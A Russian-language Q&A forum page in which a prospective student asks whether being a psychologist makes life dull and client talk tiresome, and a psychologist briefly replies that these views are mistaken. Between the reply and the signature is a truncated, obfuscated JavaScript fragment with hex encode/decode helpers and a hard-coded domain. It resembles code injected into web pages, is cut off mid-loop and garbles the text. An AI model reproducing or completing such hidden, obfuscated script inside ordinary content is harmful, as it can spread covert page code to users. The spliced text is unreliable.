Влияет ли профессиия психолога на собственную жизнь?

Олег 17.12.2015

Я давно хотел бы поступить на психолога. Помогать людям, общаться с ними, видеть счастливые глаза когда проблема будет решена...Это такое маленькое чудо в этой профессии. Но меня беспокоило всегда два вопроса по поводу этой не простой профессии.

1. Вот допустим я стал Психологом, как это проявляет на жизнь и мировоззрение? Станет ли мир наполненный чудесами, красками и непредсказуемости скучным и серым. Ведь по сути ты знаешь как устроены наши чувства, эмоции, страхи...Грубо говоря знаешь как человек себя ведёт в той или иной ситуации...От этого и становится даже грустно. Ведь жизнь то и заключается в том чтобы удивлять нас приятными или не очень событиями.

2. И второй вопрос касается пациентов. Хотя это как-то грубовато звучит...Пусть будут людей которым нужна помощь ;) Ну так вот, после общения или во время него. Не будет ли тошнить от многократной болтовни? И не будешь ли ты испытывать переживание или симпатию к своим людям которым нужна психологическая помощь?

Ваши представления и о жизни, и о работе психолога - не совсем верные.

Если захотите подробнее поговорить о волнующих Вас вопросах - обращайтесь.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "all-psy.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Г.Идрисов (работаю и по скайпу).